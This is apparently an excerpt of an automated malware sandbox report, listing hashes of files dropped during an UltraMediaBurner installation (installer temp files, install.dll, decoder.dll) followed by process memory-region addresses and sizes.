                                                                                        • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • \Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • \Users\Admin\AppData\Local\Temp\1350633989.exe
                                                                                          MD5

                                                                                          3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                          SHA1

                                                                                          f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                          SHA256

                                                                                          2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                          SHA512

                                                                                          8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                        • \Users\Admin\AppData\Local\Temp\INA30.tmp
                                                                                          MD5

                                                                                          07df9ca625c2cb953b2a7f7f699cee7c

                                                                                          SHA1

                                                                                          3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                          SHA256

                                                                                          265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                          SHA512

                                                                                          104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

                                                                                        • \Users\Admin\AppData\Local\Temp\MSI2C0.tmp
                                                                                          MD5

                                                                                          d07ddd437009ebb9c21882579bf2df0d

                                                                                          SHA1

                                                                                          a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                          SHA256

                                                                                          c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                          SHA512

                                                                                          8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                        • \Users\Admin\AppData\Local\Temp\MSI4B4.tmp
                                                                                          MD5

                                                                                          5a25fb13ed470b77eefd2eb89cb62c47

                                                                                          SHA1

                                                                                          3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                          SHA256

                                                                                          0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                          SHA512

                                                                                          2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                        • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                          MD5

                                                                                          b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                          SHA1

                                                                                          0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                          SHA256

                                                                                          9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                          SHA512

                                                                                          f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                        • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                          MD5

                                                                                          b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                          SHA1

                                                                                          0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                          SHA256

                                                                                          9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                          SHA512

                                                                                          f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                        • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                          MD5

                                                                                          b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                          SHA1

                                                                                          0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                          SHA256

                                                                                          9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                          SHA512

                                                                                          f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                        • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                          MD5

                                                                                          b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                          SHA1

                                                                                          0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                          SHA256

                                                                                          9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                          SHA512

                                                                                          f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                        • \Users\Admin\AppData\Local\Temp\is-0TGOV.tmp\ultramediaburner.tmp
                                                                                          MD5

                                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                                          SHA1

                                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                          SHA256

                                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                          SHA512

                                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                        • \Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\Ultra.exe
                                                                                          MD5

                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                          SHA1

                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                          SHA256

                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                          SHA512

                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                        • \Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\_isetup\_shfoldr.dll
                                                                                          MD5

                                                                                          92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                          SHA1

                                                                                          3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                          SHA256

                                                                                          9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                          SHA512

                                                                                          9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                        • \Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\_isetup\_shfoldr.dll
                                                                                          MD5

                                                                                          92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                          SHA1

                                                                                          3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                          SHA256

                                                                                          9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                          SHA512

                                                                                          9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                        • \Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\idp.dll
                                                                                          MD5

                                                                                          8f995688085bced38ba7795f60a5e1d3

                                                                                          SHA1

                                                                                          5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                          SHA256

                                                                                          203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                          SHA512

                                                                                          043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                        • \Users\Admin\AppData\Local\Temp\is-CK8RT.tmp\_isetup\_shfoldr.dll
                                                                                          MD5

                                                                                          92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                          SHA1

                                                                                          3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                          SHA256

                                                                                          9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                          SHA512

                                                                                          9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                        • \Users\Admin\AppData\Local\Temp\is-CK8RT.tmp\_isetup\_shfoldr.dll
                                                                                          MD5

                                                                                          92dc6ef532fbb4a5c3201469a5b5eb63

                                                                                          SHA1

                                                                                          3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                          SHA256

                                                                                          9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                          SHA512

                                                                                          9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                        • \Users\Admin\AppData\Local\Temp\is-VBD6S.tmp\Install.tmp
                                                                                          MD5

                                                                                          45ca138d0bb665df6e4bef2add68c7bf

                                                                                          SHA1

                                                                                          12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                          SHA256

                                                                                          3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                          SHA512

                                                                                          cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                        • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                          MD5

                                                                                          858c99cc729be2db6f37e25747640333

                                                                                          SHA1

                                                                                          69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                          SHA256

                                                                                          d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                          SHA512

                                                                                          f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                        • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                          MD5

                                                                                          858c99cc729be2db6f37e25747640333

                                                                                          SHA1

                                                                                          69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                          SHA256

                                                                                          d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                          SHA512

                                                                                          f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                        • \Windows\Installer\MSI9F2.tmp
                                                                                          MD5

                                                                                          07df9ca625c2cb953b2a7f7f699cee7c

                                                                                          SHA1

                                                                                          3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                          SHA256

                                                                                          265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                          SHA512

                                                                                          104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

                                                                                        • memory/308-133-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/308-130-0x0000000000000000-mapping.dmp
                                                                                        • memory/308-139-0x00000000003A0000-0x00000000003A1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/320-140-0x0000000000000000-mapping.dmp
                                                                                        • memory/696-89-0x0000000073F01000-0x0000000073F03000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/696-86-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/696-82-0x0000000000000000-mapping.dmp
                                                                                        • memory/844-75-0x0000000001F20000-0x0000000001F22000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/844-72-0x0000000000000000-mapping.dmp
                                                                                        • memory/856-198-0x00000000009F0000-0x0000000000A3B000-memory.dmp
                                                                                          Filesize

                                                                                          300KB

                                                                                        • memory/856-199-0x00000000013A0000-0x0000000001410000-memory.dmp
                                                                                          Filesize

                                                                                          448KB

                                                                                        • memory/936-137-0x0000000001270000-0x0000000001271000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/936-150-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/936-233-0x0000000000D71000-0x0000000000D72000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/936-148-0x0000000000310000-0x0000000000312000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/936-126-0x0000000000000000-mapping.dmp
                                                                                        • memory/968-127-0x0000000000000000-mapping.dmp
                                                                                        • memory/968-289-0x0000000000000000-mapping.dmp
                                                                                        • memory/968-135-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/968-136-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                          Filesize

                                                                                          72KB

                                                                                        • memory/968-291-0x0000000001072000-0x0000000001073000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/968-290-0x0000000001070000-0x0000000001071000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1052-79-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/1052-76-0x0000000000000000-mapping.dmp
                                                                                        • memory/1096-60-0x0000000075281000-0x0000000075283000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1096-61-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                          Filesize

                                                                                          172KB

                                                                                        • memory/1248-242-0x0000000003D70000-0x0000000003D87000-memory.dmp
                                                                                          Filesize

                                                                                          92KB

                                                                                        • memory/1428-309-0x0000000000070000-0x0000000000079000-memory.dmp
                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/1428-310-0x0000000000060000-0x000000000006F000-memory.dmp
                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/1520-142-0x0000000000000000-mapping.dmp
                                                                                        • memory/1520-151-0x0000000000410000-0x0000000000411000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1548-100-0x0000000000AA6000-0x0000000000AC5000-memory.dmp
                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/1548-98-0x000007FEF1A90000-0x000007FEF2B26000-memory.dmp
                                                                                          Filesize

                                                                                          16.6MB

                                                                                        • memory/1548-95-0x0000000000000000-mapping.dmp
                                                                                        • memory/1548-102-0x000000001ADA0000-0x000000001ADB9000-memory.dmp
                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/1548-99-0x0000000000AA0000-0x0000000000AA2000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1548-101-0x0000000000AC5000-0x0000000000AC6000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/1560-103-0x0000000000000000-mapping.dmp
                                                                                        • memory/1560-107-0x000007FEF1A90000-0x000007FEF2B26000-memory.dmp
                                                                                          Filesize

                                                                                          16.6MB

                                                                                        • memory/1560-108-0x0000000000B10000-0x0000000000B12000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/1560-109-0x0000000000B16000-0x0000000000B35000-memory.dmp
                                                                                          Filesize

                                                                                          124KB

                                                                                        • memory/1972-304-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2012-63-0x0000000000000000-mapping.dmp
                                                                                        • memory/2012-70-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2196-292-0x0000000000000000-mapping.dmp
                                                                                        • memory/2292-152-0x0000000000000000-mapping.dmp
                                                                                        • memory/2332-154-0x0000000000000000-mapping.dmp
                                                                                        • memory/2496-159-0x0000000000000000-mapping.dmp
                                                                                        • memory/2644-293-0x0000000000000000-mapping.dmp
                                                                                        • memory/2676-165-0x0000000000000000-mapping.dmp
                                                                                        • memory/2680-294-0x0000000000000000-mapping.dmp
                                                                                        • memory/2680-295-0x00000000073C0000-0x00000000073C1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/2812-173-0x0000000000000000-mapping.dmp
                                                                                        • memory/2852-174-0x0000000000000000-mapping.dmp
                                                                                        • memory/2872-177-0x0000000000000000-mapping.dmp
                                                                                        • memory/2940-118-0x0000000000000000-mapping.dmp
                                                                                        • memory/2984-122-0x000007FEF1A90000-0x000007FEF2B26000-memory.dmp
                                                                                          Filesize

                                                                                          16.6MB

                                                                                        • memory/2984-134-0x0000000002090000-0x0000000002092000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/2984-119-0x0000000000000000-mapping.dmp
                                                                                        • memory/3036-123-0x0000000000000000-mapping.dmp
                                                                                        • memory/3140-191-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/3140-192-0x0000000001F30000-0x0000000002031000-memory.dmp
                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • memory/3140-193-0x0000000000230000-0x000000000028C000-memory.dmp
                                                                                          Filesize

                                                                                          368KB

                                                                                        • memory/3140-183-0x0000000000000000-mapping.dmp
                                                                                        • memory/3200-190-0x0000000000000000-mapping.dmp
                                                                                        • memory/3276-194-0x00000000FF91246C-mapping.dmp
                                                                                        • memory/3276-268-0x00000000029E0000-0x0000000002AE1000-memory.dmp
                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • memory/3276-201-0x0000000000470000-0x00000000004E0000-memory.dmp
                                                                                          Filesize

                                                                                          448KB

                                                                                        • memory/3412-195-0x0000000000000000-mapping.dmp
                                                                                        • memory/3440-313-0x0000000000070000-0x0000000000076000-memory.dmp
                                                                                          Filesize

                                                                                          24KB

                                                                                        • memory/3440-314-0x0000000000060000-0x000000000006C000-memory.dmp
                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/3460-196-0x0000000000000000-mapping.dmp
                                                                                        • memory/3668-202-0x0000000000000000-mapping.dmp
                                                                                        • memory/3752-203-0x0000000000000000-mapping.dmp
                                                                                        • memory/3876-205-0x0000000000000000-mapping.dmp
                                                                                        • memory/3928-207-0x0000000000000000-mapping.dmp
                                                                                        • memory/3980-208-0x0000000000000000-mapping.dmp
                                                                                        • memory/4036-209-0x0000000000000000-mapping.dmp
                                                                                        • memory/4156-210-0x0000000000000000-mapping.dmp
                                                                                        • memory/4176-211-0x0000000000000000-mapping.dmp
                                                                                        • memory/4224-215-0x0000000000250000-0x0000000000260000-memory.dmp
                                                                                          Filesize

                                                                                          64KB

                                                                                        • memory/4224-213-0x0000000000000000-mapping.dmp
                                                                                        • memory/4224-216-0x00000000005C0000-0x00000000005D2000-memory.dmp
                                                                                          Filesize

                                                                                          72KB

                                                                                        • memory/4228-296-0x0000000000000000-mapping.dmp
                                                                                        • memory/4244-297-0x0000000000000000-mapping.dmp
                                                                                        • memory/4244-299-0x00000000005C0000-0x00000000005C1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4344-298-0x000000000041639A-mapping.dmp
                                                                                        • memory/4344-300-0x0000000000DB0000-0x0000000000DB1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4384-217-0x0000000000000000-mapping.dmp
                                                                                        • memory/4416-218-0x0000000000000000-mapping.dmp
                                                                                        • memory/4540-220-0x0000000000000000-mapping.dmp
                                                                                        • memory/4584-302-0x0000000000080000-0x00000000000EB000-memory.dmp
                                                                                          Filesize

                                                                                          428KB

                                                                                        • memory/4584-303-0x0000000000130000-0x00000000001A4000-memory.dmp
                                                                                          Filesize

                                                                                          464KB

                                                                                        • memory/4588-227-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/4588-221-0x0000000000000000-mapping.dmp
                                                                                        • memory/4664-301-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4672-222-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/4672-223-0x0000000000402F68-mapping.dmp
                                                                                        • memory/4724-234-0x00000000049C0000-0x00000000049C1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-235-0x00000000049C2000-0x00000000049C3000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-260-0x00000000066E0000-0x00000000066E1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-225-0x0000000000000000-mapping.dmp
                                                                                        • memory/4724-259-0x00000000062D0000-0x00000000062D1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-252-0x0000000006470000-0x0000000006471000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-251-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-250-0x00000000057C0000-0x00000000057C1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-245-0x0000000005680000-0x0000000005681000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-231-0x0000000000B60000-0x0000000000B61000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-240-0x0000000002830000-0x0000000002831000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-232-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4724-236-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/4732-306-0x0000000000060000-0x000000000006C000-memory.dmp
                                                                                          Filesize

                                                                                          48KB

                                                                                        • memory/4732-305-0x0000000000070000-0x0000000000077000-memory.dmp
                                                                                          Filesize

                                                                                          28KB

                                                                                        • memory/4832-307-0x0000000000090000-0x0000000000097000-memory.dmp
                                                                                          Filesize

                                                                                          28KB

                                                                                        • memory/4832-308-0x0000000000080000-0x000000000008B000-memory.dmp
                                                                                          Filesize

                                                                                          44KB

                                                                                        • memory/4840-228-0x0000000000000000-mapping.dmp
                                                                                        • memory/4872-230-0x0000000000000000-mapping.dmp
                                                                                        • memory/5024-238-0x0000000000350000-0x0000000000351000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5024-241-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5024-237-0x0000000000000000-mapping.dmp
                                                                                        • memory/5092-312-0x0000000000080000-0x0000000000089000-memory.dmp
                                                                                          Filesize

                                                                                          36KB

                                                                                        • memory/5092-311-0x0000000000090000-0x0000000000095000-memory.dmp
                                                                                          Filesize

                                                                                          20KB

                                                                                        • memory/5200-315-0x0000000000090000-0x0000000000094000-memory.dmp
                                                                                          Filesize

                                                                                          16KB

                                                                                        • memory/5624-261-0x0000000000000000-mapping.dmp
                                                                                        • memory/5668-271-0x00000000053A0000-0x00000000053A1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5668-263-0x0000000000000000-mapping.dmp
                                                                                        • memory/5668-266-0x0000000004A20000-0x0000000004A21000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5668-265-0x00000000023D0000-0x00000000023D1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5668-267-0x00000000049E0000-0x00000000049E1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5668-269-0x00000000049E2000-0x00000000049E3000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5668-270-0x0000000004940000-0x0000000004941000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5928-272-0x0000000000000000-mapping.dmp
                                                                                        • memory/5928-277-0x0000000004B62000-0x0000000004B63000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5928-276-0x0000000004B60000-0x0000000004B61000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/5948-273-0x0000000000000000-mapping.dmp
                                                                                        • memory/6000-274-0x0000000000000000-mapping.dmp
                                                                                        • memory/6040-275-0x0000000000000000-mapping.dmp
                                                                                        • memory/6344-281-0x0000000004932000-0x0000000004933000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6344-278-0x0000000000000000-mapping.dmp
                                                                                        • memory/6344-280-0x0000000004930000-0x0000000004931000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6428-279-0x0000000000000000-mapping.dmp
                                                                                        • memory/6616-112-0x0000000000000000-mapping.dmp
                                                                                        • memory/6664-282-0x0000000000000000-mapping.dmp
                                                                                        • memory/6664-284-0x0000000004B92000-0x0000000004B93000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6664-283-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6784-285-0x0000000000000000-mapping.dmp
                                                                                        • memory/6856-114-0x0000000000000000-mapping.dmp
                                                                                        • memory/6964-288-0x00000000049A2000-0x00000000049A3000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6964-287-0x00000000049A0000-0x00000000049A1000-memory.dmp
                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/6964-286-0x0000000000000000-mapping.dmp